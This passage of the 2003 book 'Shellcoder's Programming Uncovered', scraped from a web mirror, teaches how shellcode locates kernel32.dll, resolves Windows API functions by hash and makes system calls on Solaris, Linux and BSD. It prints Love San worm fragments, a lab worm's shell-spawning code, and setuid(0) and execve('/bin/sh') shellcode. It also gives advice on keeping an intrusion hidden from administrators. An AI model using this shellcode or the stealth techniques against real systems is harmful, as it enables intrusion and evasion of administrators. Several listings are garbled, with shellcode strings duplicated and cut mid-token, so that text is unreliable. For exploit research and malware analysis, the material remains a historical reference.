Technique of Calling System Functions

The possibility of calling system functions is not a mandatory condition of a successful attack, because the vulnerable program already contains everything required for the attack, including calls to the system functions and the high-level wrapper of the application libraries. Having disassembled the application being investigated and determined the addresses of the required function, it is possible to use the following constructs: call target address , push return address /jmp relative address , or mov register, absolute target address /push return address / jmp register .

The attacker position is favorable if the vulnerable program imports the LoadLibrary and GetProcAddress functions, because the shellcode will be able to load any DLL and call any of its functions. What if there is no GetProcAddress in the import table? In this case, the attacker will have to independently determine the addresses of the required functions, using the base load address returned by the LoadLibrary function, which acts either by manually parsing the Portable Executable (PE) file or by identifying the functions by their signatures. The first approach is too complicated, and the second one is unreliable. It is intolerable to rely on the fixed addresses of the system functions because they depend on the version of the operating system.

What could be done if the LoadLibrary function is missing from the import table and one or more system functions required for the shellcode propagation are missing? In UNIX systems, it is possible to use the direct call to the kernel functions implemented either by the interrupt at the 80h vector (in Linux and FreeBSD, parameters are passed through the registers) or by the far call at the 0007h:00000000h address (in System V, parameters are passed through the stack). This approach is the best. The numbers of the system calls are contained in the /usr/include/sys/syscall.h file (see also the section " Implementing System Calls in Different Operating Systems " ). Also, recall the syscall and sysenter machine commands, which, according to their "speaking names ," carry out direct system calls, along with passing parameters. In Windows NT-like operating systems, the situation is more difficult. All interactions with the kernel are carried out by the int 2Eh interrupt, unofficially called native API. Some information on this topic can be found in the legendary " Interrupt List " by Ralf Brown ( http://www.cfyme.com/rbrown.htm ) and Windows NT/2000 Native API Reference by Gary Nebbett; however, this information is not enough. This interface is extremely sparingly documented, and for now the only way to get information about it is analyzing the disassembled listings of kernel32.dll and ntdll.dll. Working with native API requires a high-level professional skill and detailed knowledge of the operating system architecture. The Windows NT kernel operates with a small number of low-level functions. These functions are not suitable for direct use and, like any "semi-product," must be prepared as appropriate. For example, the Load-Library function is "split" into at least two system calls ” NtCreateFile (EAX == 17h) opens a file, and NtCreateSection (EAX == 2Bh) maps that file to the memory (in other words, it works like the CreateFileMapping function), after which NtClose (EAX == 0Fh) closes the descriptor. The GetProcAddress function is entirely implemented within ntdll.dll, and there is no trace of it in the kernel. Nevertheless, it is included in the platform SDK and MSDN, so if the PE specification is at hand, the export table can be analyzed manually.

On the other hand, there is no need to access the kernel to choose the "emulator" of the LoadLibrary function, because the ntdll.dll and kernel32.dll libraries are always present in the address space of any process. Thus, if the hacker determines the addresses, at which they load, then the goal is achieved. I know two methods of solving this problem ” using the system structured exception handler and using the PEB. The first approach is self-evident but bulky and inelegant. The second approach is elegant but unreliable. However, the latter circumstance didn't prevent the Love San worm from propagating itself over millions of machines.

If in the course of application execution an exception arises (such as division by zero or access to a nonexistent memory page) and the application doesn't handle this situation on its own, then the system handler takes control. The system handler is usually implemented within kernel32.dll. In Windows 2000 Service Pack 3, this handler is located at the 77EAl856h address. This address depends on the version of the operating system; therefore, expertly-designed shellcode must automatically determine the handler address. There is no need to cause an exception and trace the code, as was usual in the time of good old MS-DOS. It is much better to investigate the chain of structured exception handlers packed within the EXCEPTION_REGISTRATION structure. The first double word of such handlers contains the pointer to the next handler (or the FFFFFFFFh value if there are no more handlers), and the second double word contains the address of the current handler (Listing 10.6).

Listing 10.6: The _EXCEPTION_REGISTRATION structure
image from book
 _EXCEPTION_REGISTRATION struc         prev dd ?         handler dd ? _EXCEPTION_REGISTRATION ends 
image from book
 

The first element of the chain of handlers is stored at the FS: [00000000h] address, and all the further ones reside directly in the address space of the process being investigated. Moving from element to element, it is possible to view all handlers until the element is encountered , in which the prev field contains the FFFFFFFFFh value. In this case, the handler field of the previous element will contain the address of the system handler. Unofficially, this mechanism is called " unwinding the structured exceptions stack." For more information on this topic, read " A Crash Course on the Depths of Win32 Structured Exception Handling " by Matt Pietrek (it is included in MSDN, see http://msdn.microsoft.com/msdnmag/issues/03/06/WindowsServer2003/default.aspx ).

Listing 10.7 provides an illustration of this mechanism. The code of this example returns the address of the system handler to the EAX register.

Listing 10.7: Determining the base load address of kernel32.dll using SEH
image from book
 .data:00501007    XOR EAX, EAX          ; EAX := 0 .data:00501009    XOR EBX, EBX          ; EBX := 0 .data:0050100B    MOV ECX, fs:[EAX + 4] ; Handler address .data:0050100F    MOV EAX, fs:[EAX]     ; Pointer to the next handler .data:00501012    JMP short loc_501019  ; Check the loop condition. .data:00501014 ; ---------------------------------------------------- .data:00501014 loc_501014: .data:00501014    MOV EBX, [EAX + 4]    ; Handler address .data:00501017    MOV EAX, [EAX]        ; Pointer to the next handler .data:00501019 .data:00501019 loc_501019: .data:00501019    CMP EAX, OFFFFFFFFh   ; Is this the last handler? .data:0050101C    JNZ short loc_501014  ; Loop until the loop                                         ; condition is satisfied. 
image from book
 

If at least one address belonging to the kernel32.dll is known to the hacker, then it will not be difficult to determine its base load address (it is a multiple of 1000h and contains in its beginning the NewExe header, which can be easily recognized by the MZ and PE signatures. The code provided in Listing 10.8 accepts the address of the system loader into the EBP register and returns the load address of the kernel32.dll in the same register.

Listing 10.8: Determining the base load address by searching the main memory for MZ and PE signatures
image from book
 001B:0044676C   CMP     WORD PTR[EBP+00], 5A4D      ; Is this MZ? 001B:00446772   JNZ     00446781                    ; No, it isn't. 001B:00446774   MOV     EAX, [EBP + 3C]             ; To PE header 001B:00446777   CMP     DWORD PTR [EAX + EBP + 0], 4550 ; Is this PE? 001B:0044677F   JZ      00446789                        ; Yes, it is. 001B:00446781   SUB     EBP, 00010000                   ; Next 1K block 001B:00446787   LOOP    0044676C                        ; Loop 001B:00446789   ... 
image from book
 

There is an even more elegant method of determining the base load address of the kernel32.dll library based on PEB, the pointer to which is contained in the double word located at the FS:[00000030h] address. The structure of the PEB is shown in Listing 10.9.

Listing 10.9: Implementing the PEB structure in Windows 2000/XP
image from book
 PEB                                  STRUC         PEB_InheritedAddressSpace    DB     ?         PEB_ReadImageFileExecOptions DB     ?         PEB_BeingDebugged            DB     ?         PEB_SpareBool                DB     ?         PEB_Mutant                   DD     ?         PEB_ImageBaseAddress         DD     ?         PEB_PebLdrData               DD     PEB_LDR_DATA PTR ?  ; +0Ch         ...         PEB_SessionId                DD     ? PEB 
image from book
 

By the OCh offset, PEB contains the pointer to the PEN_LDR_DATA structure, representing the list of loaded DLLs, listed according to the order of their initialization. The ntdll.dll library is the first to initialize, and kernel32.dll follows it. The PEN_LDR_DATA structure is shown in Listing 10.10.

Listing 10.10: Implementing the PEB_LDR_DATA structure under Windows 2000/XP
image from book
 PEB_LDR_DATA STRUC         PEB_LDR_cbsize                  DD         ?        ; +00         PEB_LDR_Flags                   DD         ?        ; +04         PEB_LDR_Unknown8                DD         ?        ; +08         PEB_LDR_InLoadOrderModuleList   LIST_ENTRY ?        ; +OCh         PEB_LDR_InMemoryOrderModuleList LIST_ENTRY ?        ; +14h         PEB_LDR_InInitOrderModuleList   LIST_ENTRY ?        ; +1Ch PEB_LDR_DATA ENDS LIST_ENTRY STRUC         LE_FORWARD          DD    *forward_in_the_list     ;  + 00h         LE_BACKWARD         DD    *backward_in_the_list    ;  + 04h         LE_IMAGE_BASE       DD    imagebase_of_ntdll.dll   ;  + 08h         ...         LE_IMAGE_TIME       DD    imagetimestamp           ;  + 44h LIST_ENTRY 
image from book
 

In general, the idea consists of reading the double word at the FS: [00000030h] address, converting it into the pointer to PEB, and jumping to the address referenced by the pointer located at the 0Ch offset ” InInitOrderModuleList. Having discarded the first element, belonging to ntdll.dll, it is possible to obtain the pointer to LIST_ENTRY, which contains the characteristics of kernel32.dll (in particular, the base load address is stored in the third double word). It is much easier to program this algorithm then to describe doing so. The preceding description easily fits within five Assembly commands.

Listing 10.11 shows the code fragment from the Love San worm, a dangerous thread to the Internet. This fragment has no relation to the author of the worm. On the contrary, it was borrowed from third-party sources. This is indicated by the presence of "extra" Assembly commands intended for compatibility with Windows 9 x (for which the situation is different from the one that exists in Windows NT). The natural habitat of the Love San worm is limited to Windows NT-like systems, and it is unable to infect Windows 9 x systems.

Listing 10.11: Fragment of the Love San worm
image from book
  data:004046FE 64 Al 30 00 00 MOV  EAX, large fs:30h  ;PEB base data:00404704 85 C0          TEST EAX, EAX          ; data:00404706 78 0C          JS   short loc_404714  ; Windows9x  data:00404708 8B 40   0C       MOV  EAX, [EAX + 0Ch]  ;  PEB_LDR_DATA  data:0040470B 8B 70   1C       MOV  ESI, [EAX + 1Ch]  ;  The first element of                                                     ; IninitOrderModuleList  data:0040470E AD   LODSD                  ;  Next element  data:0040470F 8B 68 08       MOV  EBP, [EAX + 8]    ;  Base address of                                           ; kemel32.dll data:00404712 EB 09           JMP SHORT loc_40471D data:00404714 ; ------------------------------------------------------------ data:00404714 loc_404714:                 ; CODE XREF: kk_get_kernel32 + A   j data:00404714 8B 40 34        MOV EAX, [EAX + 34h] data:00404717 8B A8 B8 00 00+ MOV EBP, [EAX + 0B8h] data:00404717 data:0040471D loc_40471D:                 ; CODE XREF: kk_get_kerenel32 + 16   j 
image from book
 

The code fragment in Listing 10.11 is responsible for determining the base load address of kernel32.dll and ensuring that the worm is practically independent on the version of the attacked operating system.

Manual parsing of the PE format, however scaringly it sounds, can be implemented easily. The double word, located at the 3Ch offset from the beginning of the base load address, contains the offset (not the pointer) of the PE file header. This header, in turn , contains the offset of the export table in the double word 78h, where bytes 18h to 1Bh and 20h to 23h store the number of exported functions and the offset of exported names, respectively (although functions are exported by ordinals, the offset of the export table is located in bytes 24h to 27h ). Memorize these values ” 3Ch, 78h, 20h/24h. Because they are frequently encountered when investigating the code of worms and exploits, doing so will considerably simplify identification of their algorithms. For example, the fragment of the Love San worm responsible for determining the address of the table of exported names is provided in Listing 10.12.

Listing 10.12: Love San worm fragment that determines the table of exported names address
image from book
 .data:00404728 MOV EBP, [ESP + arg_4]     ; Base load address of kernel32 .data:0040472C MOV EAX, [EBP + 3Ch]       ; To PE header .data:0040472F MOV EDX, [EBP + EAX + 78h] ; To the export table .data:00404733 ADD EDX, EBP .data:00404735 MOV ECX, [EDX + 18h]       ; Number of exported functions .data:00404738 MOV EBX, [EDX + 20h]       ; To the table of exported names .data:0040473B ADD EBX, EBP               ; Address of the table                                           ; of exported names 
image from book
 

Now, based on the address of the table of exported names (which in a rough approximation represents an array of the text ASCIIZ strings, each of which corresponds to an appropriate API function), it is possible to obtain all the required information. However, a character-by-character comparison is inefficient, and hackers often abandon it. This is because, first, the names of most API functions are too bulky while the shellcode is strictly limited in size . Second, explicit load of API functions considerably simplifies the analysis of the shellcode algorithms. On the other hand, the algorithm of hash comparison is free from all these drawbacks. In general, it is reduced to the convolution of the compared strings by some function f. Detailed information about this algorithm can be found in specialized literature (for instance, see The Art of Computer Programming by Donald Knuth). Here, only the code supplied with detailed comments will be provided (Listing 10.13).

Listing 10.13: Love San worm fragment that determines the function index in the table
image from book
 .data:0040473D  loc_40473D:              ; CODE XREF: kk_get_proc_adr + 36j .data:0040473D  JECXZ short loc_404771   ;   Error .data:0040473F  DEC   ECX                ; ECX contains the list                                          ; of exported functions. .data:00404740  MOV   ESI, [EBX + ECX*4] ; Offset of the end of the array                                          ; of exported functions .data:00404743  ADD   ESI, EBP           ; Address of the end of the array                                          ; of exported functions .data:00404745  XOR   EDI, EDI           ; EDI := 0 .data:00404747  CLD                      ; Reset the direction flag. .data:00404748 .data:00404748  loc_404748:              ; CODE XREF: kk_get_proc_adr+30   j .data:00404748  XOR  EAX, EAX            ; EAX:= 0 .data:0040474A  LODSB                    ; Read the next character                                          ; of the function name. .data:0040474B  CMP  AL, AH              ; Is this the end of the string? .data:0040474D  JZ   short loc_404756    ; If this is the end,                                          ; then jump to the end. .data:0040474F  OR   EDI, 0Dh            ; Hash the function name .data:00404752  ADD  EDI, EAX            ; and accumulate the hash sum                                          ; in the EDI register. .data:00404754  JMP  short loc_404748    ; .data:00404756  loc_404756:              ; CODE XREF: kk_get_proc_adr + 29   j .data:00404756  CMP  EDI, [ESP + ARG_0]  ; Is this the hash of the function? .data:0040475A  JNZ  short loc_40473D    ; If no, continue testing. 
image from book
 

Knowing the address of the target function in the export table, it is easy to determine its address. For example, this can be done as shown in Listing 10.14.

Listing 10.14: Love San worm fragment that determines the actual address of an API function in the main memory
image from book
 .data:0040475C MOV EBX, [EDX + 24h]   ; Offset of the exported ordinals table .data:0040475F ADD EBX, EBP           ; Address of the ordinals table .data:00404761 MOV CX, [EBX + ECX*2]  ; Get the index within the ordinals table. .data:00404765 MOV EBX, [EDX + 1Ch]   ; Offset of the exported addresses table .data:00404768 ADD EBX, EBP           ; Address of the exported addresses table .data:0040476A MOV EAX, [EBX + ECX*4] ; Get the offset of the function by index. .data:0040476D ADD EAX, EBP           ; Get the function address. 
image from book
 

Implementing System Calls in Different Operating Systems

The mechanism of system calls is the background of the operating system, or its internal "kitchen," which is not always well documented. Inside the worm, some constants and commands are floating, which in a sophisticated manner manipulate registers. However, the physical meaning of what is going on remains unclear.

The family of UNIX-like operating systems overwhelms everyone with their variety, complicating the development of portable shellcodes to the extreme. At least six methods of organizing the interface with the kernel are used, including far call by selector 7 offset 0 (HP-UX/PA-RISC, Solaris/x86, xBSD/x86), syscall (IRIX/MIPS), ta8 (Solaris/SPARC), svca (AIX/Power/PowerPC), INT 25h (BeOS/x86), and INT 80h (xBSD/x86, Linux/x86). The order of passing parameters and the number of system calls are different for different operating systems. Some systems are listed twice, which means that they use hybrid mechanisms of system calls. It is inexpedient and simply impossible to describe every system in detail here, because doing so would take too much space. Furthermore, this information was long ago provided in " UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes " by the Last Stage of Delirium Research Group ( http://opensores.thebunker.net/pub/mirrors/blackhat/presentations/bh-usa-01/LSD/bh-usa-01-lsd.pdf ).

Yes! This is the same legendary hacker group that found a hole in Remote Procedure Call (RPC). They are real experts and excellent programmers. The preceding manual is highly recommended to code diggers in general and investigators of viruses and worms in particular.

Provided in Listing 10.15 is the fragment of the mworm lab worm, which I developed after reading their documentation. This worm demonstrates the technique of using system calls under xBSD/x86 (see also Fig. 10.1).

image from book
Figure 10.1: An example illustrating how system calls can be used for malicious purposes
Listing 10.15: Fragment of the mworm worm using remote shell under xBSD/x86
image from book
 data:0804F860 x86_fbsd_shell:                     ; EAX := 0 data:0804F860 31 C0            XOR    EAX, EAX data:0804F862 99               CDQ                ; EDX  :  = 0 data:0804F863 50               PUSH   EAX data:0804F864 50               PUSH   EAX data:0804F865 50               PUSH   EAX data:0804F866 B0 7E            MOV    AL, 7Eh data:0804F868 CD 80            INT    80h         ; LINUX - sys_sigprocmask data:0804F86A 52               PUSH   EDX         ; Terminating zero data:0804F86B 68 6E 2F 73 68   PUSH   68732F6Eh   ; ..n/sh data:0804F870 44               INC    ESP data:0804F871 68 2F 62 69 6E   PUSH   6E69622Fh   ; /bin/n.. data:0804F876 89 E3            MOV    EBX, ESP data:0804F878 52               PUSH   EDX data:0804F879 89 E2            MOV    EDX, ESP data:0804F87B 53               PUSH   EBX data:0804F87C 89 El            MOV    ECX, ESP data:0804F87E 52               PUSH   EDX data:0804F87F 51               PUSH   ECX data:0804F880 53               PUSH   EBX data:0804F881 53               PUSH   EBX data:0804F882 6A 3B            PUSH   3Bh data:0804F884 58               POP    EAX data:0804F885 CD 80            INT    80h         ; LINUX - sys_olduname data:0804F887 31 C0            Xor    EAX, EAX data:0804F889 FE C0            INC    AL data:0804F88B CD 80            INT    80h         ; LINUX - sys_exit 
image from book
 

Solaris/SPARC

The system call is carried out using the trap, raised by the ta 8 machine command. The number of the system call is passed using the G1 register, and arguments are passed using the 00, 01, 02, 03, and 04 registers. The list of numbers of the most widely-used system functions is provided in Listing 10.16. Listing 10.17 provides an example of shellcode demonstrating the use of system calls under Solaris/SPARC.

Listing 10.16: Numbers of system calls in Solaris/SPARC
image from book
 Syscall  %g1  %o0, %o1, %o2, %o3, %o4 Exec     00Bh   path = "/bin/ksh",   [   a0 = path,0] Exec     00Bh   path = "/bin/ksh",   [   a0 = path,   al= "-c"   a2 = cmd, 0] Setuid   017h uid = 0 Mkdir    050h   path = "b..",  mode = (each value is valid) Chroot   03Dh   path = "b..",  "." Chdir    00Ch   path = ".." Ioctl   036h sfd, TI_GETPEERNAME = 5491h,   [mlen = 54h,  len = 54h,   sadr = []] so_socket 0E6h AF_INET = 2, SOCK_STREAM = 2, prot =0, devpath = 0, SOV_DEFAULT = 1 bind    0E8h sfd,   sadr = [33h, 2, hi, lo, 0, 0, 0, 0], len=10h, SOV_SOCKSTREAM = 2 listen   0E9h sfd, backlog = 5, vers = (not required in this syscall) accept   0EAh sfd, 0, 0, vers = (not required in this syscall) fcntl    03Eh sfd, F_DUP2FD = 09h, fd = 0, 1, 2 
image from book
 
Listing 10.17: An example illustrating shellcode under Solaris/SPARC
image from book
 char shellcode[]=  /* 10*4+8 bytes */ "\x20\xbf\xff\xff" /* bn, a <shellcode-4> ; \                           */ "\x20\xbf\xff\xff" /* bn, a <shellcode>   ; +- the current command                                           ; pointer in %o7              */ "\x7f\xff\xff\xff" /* call <shellcode+4>  ; /                           */ "\x90\x03\xe0\x20" /* add %o7,32,%o0      ; %o0 contains the pointer                                           ; to /bin/ksh.                */ "\x92\x02\x20\x10" /* add %o0,16,%o1      ; %ol contains the pointer                                           ; to free memory.             */ "\xc0\x22\x20\x08" /* st %g0,[%o0+8]      ; Place terminating zero                                           ;into /bin/ksh.               */ "\xd0\x22\x20\x10" /* st %o0,[%o0+16]     ; Reset the memory to zero                                           ; by the %o1 pointer.         */ "\xc0\x22\x20\x14" /* st %g0,[%o0+20]     ; The same                    */ "\x82\x10\x20\x0b" /* mov 0x0b,%gl        ; Number of the exec                                           ; system function             */ "\x91\xd0\x20\x08" /* ta 8                ; Call the exec function.     */ "/bin/ksh"; 
image from book
 

Solaris/x86

The system call is carried out using the far call gateway at the 007:00000000 address (selector 7 offset 0). The number of the system call is passed using the EAX register, and arguments are passed through the stack, the leftmost argument being the last to be pushed into the stack. The function being called must clear the stack on its own. The list of numbers of the most widely-used system functions is provided in Listing 10.18. Listing 10.19 provides an example of shell-code demonstrating the use of system calls under Solaris/x86.

Listing 10.18: Numbers of system calls under Solaris/x86
image from book
 syscall   %eax   stack exec      0Bh   RET,   path = "/bin/ksh",   [   a0 = path, 0] exec      0Bh   RET,   path = "/bin/ksh",     [   a0 = path,   al = "-c",   a2 = cmd, 0] setuid    17h   RET, uid = 0 mkdir     50h   RET,   path = "b..", mode = (each value is valid) chroot    3Dh   RET,   path = "b..","." chdir     OCh   RET,   path = ".." ioctl     36h   RET, sfd, TI_GETPEERNAME = 5491h,     [mlen = 91h, len = 91h,   adr = []] so socket E6h   RET, AF_INET = 2,SOCK STREAM = 2,                      prot = 0,devpath = 0,SOV DEFAULT = 1 bind      E8h   RET, sfd,     sadr = [FFh, 2, hi, lo, 0,0,0,0],len = 10h,SOV_SOCKSTREAM = 2 listen    E9h   RET, sfd, backlog = 5, vers = (not required in this syscall) accept    Eah   RET, sfd, 0, 0, vers = (not required in this syscall) fcntl     3Eh   RET, sfd, F_DUP2FD = 09h, fd = 0, 1, 2 
image from book
 
Listing 10.19: An example of shellcode under Solaris/x86
image from book
 char setuidcode[]=   /* 7 bytes */ "\x33\xc0"           /* XORL %EAX, %ERX  ; ERX := 0                      */ "\x50"               /* PUSHL %EAX       ; Push zero into the stack.     */ "\xb0\x17"           /* MOVB 
 char setuidcode[]= /* 7 bytes */ "\x33\xc0" /* XORL %EAX, %ERX ; ERX := 0 */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\xb0\x17" /* MOVB $0x17, %AL ; Setuid system function number */ "\xff\xd6" /* CALL *%ESI ; setuid(0) */ 
x17, %AL ; Setuid system function number */ "\xff\xd6" /* CALL *%ESI ; setuid(0) */
image from book
 

Linux/x86

The system call is carried out through a software interrupt at vector 80h, raised by the int 80h machine instructions. The number of the system call is passed through the EAX register, and arguments are passed through the EBX, ECX, and EDX registers. The list of numbers of the most widely-used system functions is provided in Listing 10.20. Listing 10.21 provides an example of shellcode demonstrating the use of system calls under Linux/x86.

Listing 10.20: Numbers of system calls under Linux/x86
image from book
 Syscall     %EAX   %EBX, %ECX, %EDX exec        0Bh   path = "/bin//sh",   [   a0 = path, 0] exec        0Bh   path = "/bin//sh",     [   a0 = path,   al = "-c",   a2 = cmd, 0] setuid      17h    uid = 0 mkdir       27h   path = "b..", mode = 0 (each value is valid) chroot      3Dh   path = "b..", "." chdir       0Ch   path = ".. " socketcall  66h    getpeername = 7,   [sfd,   sadr = [],   [len = 10h]] socketcall  66h    socket = 1,   [AF_INET = 2, SOCK STREAM = 2,prot = 0] socketcall  66h    bind = 2,     [sfd,   sadr = [FFh, 2, hi, lo, 0, 0, 0, 0], len = 10h] socketcall  66h    listen = 4,   [sfd, backlog = 102] socketcall  66h    accept = 5,   [sfd, 0, 0] dup2        3Fh    sfd, fd = 2, 1, 0 
image from book
 
Listing 10.21: An example of shellcode under Linux/x86
image from book
 char setuidcode[]= /* 8 bytes */ "\x33\xc0"       /* XORL %EAX, %ERX ; ERX := 0                            */ "\x31\xdb"       /* XORL %EBX, %EBX ; EBX := 0                            */ "\xb0\x17"       /* MOVB 
 char setuidcode[]= /* 8 bytes */ "\x33\xc0" /* XORL %EAX, %ERX ; ERX := 0 */ "\x31\xdb" /* XORL %EBX, %EBX ; EBX := 0 */ "\xb0\x17" /* MOVB $0X17, %AL ; Number of the stuid system function */ "\xcd\x80" /* INT $0x80 ; setuid(0) */ 
X17, %AL ; Number of the stuid system function */ "\xcd\x80" /* INT
 char setuidcode[]= /* 8 bytes */ "\x33\xc0" /* XORL %EAX, %ERX ; ERX := 0 */ "\x31\xdb" /* XORL %EBX, %EBX ; EBX := 0 */ "\xb0\x17" /* MOVB $0X17, %AL ; Number of the stuid system function */ "\xcd\x80" /* INT $0x80 ; setuid(0) */ 
x80 ; setuid(0) */
image from book
 

FreeBSD, NetBSD, and OpenBSD for the x86 Platform

Operating systems from the BSD family implement a hybrid mechanism of calling system functions: they support both the far call to the 0007:00000000 address (however, the numbers of system functions are different) and the interrupt at vector 80h . Arguments in both cases are passed through the stack. The list of numbers of the most widely-used system functions is provided in Listing 10.22. Listing 10.23 provides an example of shellcode demonstrating the use of system calls under BSD/x86.

Listing 10.22: Numbers of system calls in BSD/x86
image from book
 Syscall     %EAX stack Execve      3Bh  RET,   path = "//bin//sh",   [   a0 = 0], 0 Execve      3Bh  RET,   path = "//bin//sh",     [   a0 = path,   al = "-c",   a2 = cmd, 0] 0 Setuid      17h  RET, uid = 0 Mkdir       88h  RET,   path = "b..", mode = (each value is valid) Chroot      3Dh  RET,   path = "b..", "." Chdir       0Ch  RET,   path=" . . " Getpeername 1Fh  RET, sfd,   sadr = [],   [len = 10h] Socket      61h  RET, AF_INET = 2, SOCK_STREAM = 1, prot = 0 Bind        68h  RET, sfd,   sadr = [FFh, 2, hi, lo, 0, 0, 0, 0],   [10h] Listen      6Ah  RET, sfd, backlog = 5 Accept      1Eh  RET, sfd, 0, 0 dup2        5Ah  RET, sfd, fd = 0, 1, 2 
image from book
 
Listing 10.23: An example illustrating shellcode under BSD/x86
image from book
 char shellcode[]= /* 23 bytes */ "\x31\xc0"   /* XORL %EAX, %EAX   ; EAX := 0                               */ "\x50"       /* PUSHL %EAX        ; Push the terminating zero into                                   ; the stack.                             */ "\x68""//sh" /* PUSHL 
 char shellcode[]= /* 23 bytes */ "\x31\xc0" /* XORL %EAX, %EAX ; EAX := 0 */ "\x50" /* PUSHL %EAX ; Push the terminating zero into ; the stack. */ "\x68""//sh" /* PUSHL $0x68732f2f ; Push the string tail into the stack. */ "\x68""/bin" /* PUSHL $0x6e69622f ; Push the string head into the stack. */ "\x89\xe3" /* MOVL %ESP, %EBX ; Set EBX to the stack top. */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\x54" /* PUSHL %ESP ; Pass the zero pointer to the function. */ "\x53" /* PUSHL %EBX ; Pass the pointer to /bin/sh to ; the function. */ "\x50" /* PUSHL %EAX ; Pass zero to the function. */ "\xb0\x3b" /* MOVB $0x3b, %AL ; Number of the execve system function */ "\xcd\x80" /* INT $0x80 ; execve("//bin//sh", "",0); */ 
x68732f2f ; Push the string tail into the stack. */ "\x68""/bin" /* PUSHL
 char shellcode[]= /* 23 bytes */ "\x31\xc0" /* XORL %EAX, %EAX ; EAX := 0 */ "\x50" /* PUSHL %EAX ; Push the terminating zero into ; the stack. */ "\x68""//sh" /* PUSHL $0x68732f2f ; Push the string tail into the stack. */ "\x68""/bin" /* PUSHL $0x6e69622f ; Push the string head into the stack. */ "\x89\xe3" /* MOVL %ESP, %EBX ; Set EBX to the stack top. */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\x54" /* PUSHL %ESP ; Pass the zero pointer to the function. */ "\x53" /* PUSHL %EBX ; Pass the pointer to /bin/sh to ; the function. */ "\x50" /* PUSHL %EAX ; Pass zero to the function. */ "\xb0\x3b" /* MOVB $0x3b, %AL ; Number of the execve system function */ "\xcd\x80" /* INT $0x80 ; execve("//bin//sh", "",0); */ 
x6e69622f ; Push the string head into the stack. */ "\x89\xe3" /* MOVL %ESP, %EBX ; Set EBX to the stack top. */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\x54" /* PUSHL %ESP ; Pass the zero pointer to the function. */ "\x53" /* PUSHL %EBX ; Pass the pointer to /bin/sh to ; the function. */ "\x50" /* PUSHL %EAX ; Pass zero to the function. */ "\xb0\x3b" /* MOVB
 char shellcode[]= /* 23 bytes */ "\x31\xc0" /* XORL %EAX, %EAX ; EAX := 0 */ "\x50" /* PUSHL %EAX ; Push the terminating zero into ; the stack. */ "\x68""//sh" /* PUSHL $0x68732f2f ; Push the string tail into the stack. */ "\x68""/bin" /* PUSHL $0x6e69622f ; Push the string head into the stack. */ "\x89\xe3" /* MOVL %ESP, %EBX ; Set EBX to the stack top. */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\x54" /* PUSHL %ESP ; Pass the zero pointer to the function. */ "\x53" /* PUSHL %EBX ; Pass the pointer to /bin/sh to ; the function. */ "\x50" /* PUSHL %EAX ; Pass zero to the function. */ "\xb0\x3b" /* MOVB $0x3b, %AL ; Number of the execve system function */ "\xcd\x80" /* INT $0x80 ; execve("//bin//sh", "",0); */ 
x3b, %AL ; Number of the execve system function */ "\xcd\x80" /* INT
 char shellcode[]= /* 23 bytes */ "\x31\xc0" /* XORL %EAX, %EAX ; EAX := 0 */ "\x50" /* PUSHL %EAX ; Push the terminating zero into ; the stack. */ "\x68""//sh" /* PUSHL $0x68732f2f ; Push the string tail into the stack. */ "\x68""/bin" /* PUSHL $0x6e69622f ; Push the string head into the stack. */ "\x89\xe3" /* MOVL %ESP, %EBX ; Set EBX to the stack top. */ "\x50" /* PUSHL %EAX ; Push zero into the stack. */ "\x54" /* PUSHL %ESP ; Pass the zero pointer to the function. */ "\x53" /* PUSHL %EBX ; Pass the pointer to /bin/sh to ; the function. */ "\x50" /* PUSHL %EAX ; Pass zero to the function. */ "\xb0\x3b" /* MOVB $0x3b, %AL ; Number of the execve system function */ "\xcd\x80" /* INT $0x80 ; execve("//bin//sh", "",0); */ 
x80 ; execve("//bin//sh", "",0); */
image from book
 

Recovering the Vulnerable Program after Overflow

Recovery of the usability of the vulnerable program after overflow is not only a guarantee of keeping the intrusion a secret but also an indicator of a certain level of culture. Having accomplished its mission, the worm must not return control to the host program, because it will almost certainly crash (the probability of the crash is close to one), which will make an administrator suspicious.

If every new TCP/IP connection is processed by a vulnerable program in a separate thread, then for the virus it will be enough to simply kill its thread by calling the TerminateThread API function. It is also possible to enter an endless loop (however, on a uniprocessor machine the CPU load might grow to 100%, which also raises suspicions).

With single-threaded applications, the situation is more difficult. The worm must on its own "manually" recover the damaged data in a workable form, or unwind the stack. It must emerge somewhere in the parent function, which is not touched by corruption yet, or even pass control to some dispatcher function involved in sending messages.

For the moment, no universal techniques have been invented, although during recent years this topic is has been actively discussed and is being worked out.



Shellcoder's Programming Uncovered
Shellcoders Programming Uncovered (Uncovered series)
ISBN: 193176946X
EAN: 2147483647
Year: 2003
Pages: 164

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net